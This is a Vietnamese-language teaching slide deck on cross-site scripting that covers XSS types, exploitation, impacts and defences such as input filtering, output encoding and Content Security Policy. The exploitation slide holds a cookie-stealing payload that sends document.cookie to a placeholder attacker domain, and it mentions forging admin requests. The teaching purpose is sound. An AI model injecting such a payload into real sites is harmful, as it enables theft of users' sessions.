CROSS

SITE
SCRIPTIN
G
01
Khái niệm Nội dung

02 Các dạng XSS

03 Khai thác XSS

04 Ảnh hưởng

05 Phòng chống
 01
Khái niệm
 Khái niệm
XSS là một lỗ hổng bảo mật web cho phép kẻ tấn
công xâm phạm các tương tác của người dùng với
một ứng dụng dễ bị tấn công thông qua các mã
script.
 02
Các dạng
XSS
 01 02 03
Reflected XSS Stored XSS DOM-based XSS
Chỉ thực thi được ở Mã độc được lưu vào Khai thác XSS dựa
phía client mà không cơ sở dữ liệu của trên việc thay đổi cấu
lưu vào cơ sở dữ liệu website trúc DOM
của website
 03
Khai thác
XSS
 Static Analysis
(Source code review)

Dynamic analysis
(Fuzzing)
 Lấy cookie người dùng với
XSS
Cần có domain để kiểm soát log và lấy thông tin
<img src=x
onerror=this.src='http://domain/?'+document.cookie;>
 Giả mạo yêu cầu với XSS
Khi các cookie quan trọng được set HTTP Only flag,
việc lấy cookie là không khả thi.
Có thể sử dụng XSS để giả mạo một yêu cầu của admin
như crawl dữ liệu của trang admin.
 04
Ảnh hưởng
 Our Partners

Redirection Session Cross Site

Hijacking Request forgery

Keylogging Phishing
 05
Phòng chống
 Cách phòng tránh

Lọc ký tự đầu vào Mã hóa dữ liệu

Lọc các từ nguy hiểm như:
<script></script>, <img, … Mã hóa dữ liệu trước khi trả về cho
người dùng để tránh việc thực thi các
mã độc

Chính sách bảo mật nội dung (CSPs)

CSP sử dụng tiêu đề phản hồi HTTP có tên Content-Security-Policy và cung

cấp một giá trị chứa chính sách. Chính sách này giúp các nhà phát triển kiểm
soát các yếu tố khác nhau, chẳng hạn như thực thi tập lệnh nội tuyến, nguồn đối
tượng và tải các tập lệnh bên ngoài.